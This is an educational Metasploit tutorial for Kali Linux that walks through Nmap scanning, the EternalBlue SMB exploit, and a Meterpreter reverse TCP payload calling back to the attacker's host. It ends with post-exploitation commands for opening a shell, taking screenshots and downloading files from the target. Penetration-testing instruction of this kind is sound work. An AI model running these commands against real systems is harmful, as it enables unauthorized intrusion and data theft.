# Metasploit on Kali Linux ## Metasploit on Kali Linux: A Step-by-Step Tutorial **Disclaimer:** This tutorial is intended for educational purposes **only**. Always ensure you have explicit permission to perform penetration testing on any network or system. Unauthorized access to computer systems is illegal and unethical. *** ### Table of Contents 1. Introduction to Metasploit 2. Setting Up the Environment 3. Starting Metasploit Framework 4. Basic Commands in Metasploit 5. Scanning and Enumerating Targets 6. Selecting and Configuring Exploits 7. Choosing and Configuring Payloads 8. Executing the Exploit 9. Post-Exploitation with Meterpreter 10. Closing the Session and Exiting Metasploit 11. Best Practices and Ethical Considerations *** ### 1. Introduction to Metasploit Metasploit Framework is a powerful tool used by cybersecurity professionals for penetration testing and vulnerability assessments. It provides a suite of tools for simulating attacks on networks and systems to identify security weaknesses. ### 2. Setting Up the Environment #### Prerequisites * **Kali Linux** installed on your machine (bare-metal, virtual machine, or live boot). * **Basic understanding** of networking and command-line interface. #### Updating Kali Linux Before starting, ensure your system is up-to-date: ```bash sudo apt update && sudo apt upgrade -y ``` ### 3. Starting Metasploit Framework Metasploit comes pre-installed on Kali Linux. To start the Metasploit console: 1. **Open a terminal window.** 2. **Initialize the PostgreSQL database** (required for Metasploit): ```bash sudo service postgresql start ``` 3. **Start the Metasploit console:** ```bash sudo msfconsole ``` *You should see the Metasploit banner and the `msf>` prompt.* You can also find it by navigating in the Kali Linux menu system. ### 4. Basic Commands in Metasploit Familiarize yourself with some basic commands: * **`help`**: Displays help menu with a list of commands. ```bash msf> help ``` * **`version`**: Shows the current version of Metasploit. ```bash msf> version ``` * **`search`**: Searches for exploits, payloads, and modules. ```bash msf> search smb ``` * **`use`**: Selects a module to use. ```bash msf> use exploit/windows/smb/ms17_010_eternalblue ``` * **`show options`**: Displays options for the selected module. ```bash msf> show options ``` ### 5. Scanning and Enumerating Targets Before exploiting, gather information about the target. #### Using Nmap within Metasploit 1. **Run Nmap scan:** ```bash msf> db_nmap -sV -O 192.168.1.10 ``` *Replace `192.168.1.10` with the target IP address.* 2. **View the scanned hosts:** ```bash msf> hosts ``` 3. **List open services and ports:** ```bash msf> services ``` ### 6. Selecting and Configuring Exploits #### Searching for Exploits 1. **Use the `search` command with relevant keywords:** ```bash msf> search type:exploit name:smb ``` #### Selecting an Exploit 1. **Choose an exploit module:** ```bash msf> use exploit/windows/smb/ms17_010_eternalblue ``` 2. **View exploit options:** ```bash msf> show options ``` #### Setting Exploit Options 1. **Set the target IP address:** ```bash msf> set RHOSTS 192.168.1.10 ``` 2. **Confirm the options are set:** ```bash msf> show options ``` ### 7. Choosing and Configuring Payloads #### Listing Available Payloads 1. **Show compatible payloads:** ```bash msf> show payloads ``` #### Selecting a Payload 1. **Choose a payload (e.g., reverse TCP shell):** ```bash msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp ``` 2. **Set the local host IP (your machine's IP):** ```bash msf> set LHOST 192.168.1.5 ``` *Replace `192.168.1.5` with your Kali Linux IP address.* 3. **(Optional) Set the local port:** ```bash msf> set LPORT 4444 ``` ### 8. Executing the Exploit 1. **Run the exploit:** ```bash msf> exploit ``` *Metasploit will attempt to exploit the target and establish a Meterpreter session.* ### 9. Post-Exploitation with Meterpreter Once a session is established, you can interact with the target system. #### Basic Meterpreter Commands * **`sysinfo`**: Displays system information. ```bash meterpreter> sysinfo ``` * **`getuid`**: Shows user ID. ```bash meterpreter> getuid ``` * **`shell`**: Drops into a shell on the target system. ```bash meterpreter> shell ``` * **`screenshot`**: Takes a screenshot of the target desktop. ```bash meterpreter> screenshot ``` * **`download`**: Downloads a file from the target system. ```bash meterpreter> download C:\\path\\to\\file.txt ``` #### Exiting Meterpreter * **`exit`**: Closes the Meterpreter session. ```bash meterpreter> exit ``` ### 10. Closing the Session and Exiting Metasploit 1. **List active sessions:** ```bash msf> sessions -l ``` 2. **Interact with a session:** ```bash msf> sessions -i [session_id] ``` 3. **Close a session:** ```bash msf> sessions -k [session_id] ``` 4. **Exit Metasploit:** ```bash msf> exit ``` ### 11. Best Practices and Ethical Considerations * **Legal Authorization**: Always obtain written permission before performing any penetration testing. * **Ethical Responsibility**: Use Metasploit to improve security, not to exploit vulnerabilities for malicious purposes. * **Confidentiality**: Keep any sensitive data obtained during testing confidential. * **Reporting**: Provide detailed reports of your findings to the appropriate parties to help remediate vulnerabilities. * **Continuous Learning**: Stay updated with the latest security trends and Metasploit modules. *** Note: Always remember the importance of legality and ethics in cybersecurity work. Use these skills responsibly to contribute to a safer digital environment.